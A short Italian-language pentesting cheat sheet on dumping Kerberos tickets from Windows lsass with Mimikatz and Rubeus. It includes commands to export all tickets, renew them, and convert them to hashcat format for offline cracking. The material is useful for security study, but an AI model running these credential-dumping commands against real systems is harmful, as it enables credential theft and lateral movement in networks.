I ticket in Windows sono gestiti e archiviati dal processo lsass (Local Security Authority Subsystem Service), responsabile della gestione delle politiche di sicurezza. Per estrarre questi ticket, è necessario interfacciarsi con il processo lsass. Un utente non amministratore può accedere solo ai propri ticket, mentre un amministratore ha il privilegio di estrarre tutti i ticket presenti nel sistema. Per tali operazioni, vengono ampiamente utilizzati gli strumenti Mimikatz e Rubeus, ognuno dei quali offre comandi e funzionalità diverse.

Mimikatz

Mimikatz è uno strumento versatile che può interagire con la sicurezza di Windows. Viene utilizzato non solo per l'estrazione dei ticket, ma anche per varie altre operazioni legate alla sicurezza.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus è uno strumento appositamente progettato per l'interazione e la manipolazione di Kerberos. Viene utilizzato per l'estrazione e la gestione dei ticket, nonché per altre attività legate a Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Quando si utilizzano questi comandi, assicurarsi di sostituire i segnaposto come <BASE64_TICKET> e <luid> con il ticket codificato in Base64 e l'ID di accesso effettivo rispettivamente. Questi strumenti forniscono una vasta funzionalità per la gestione dei ticket e l'interazione con i meccanismi di sicurezza di Windows.

Riferimenti

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/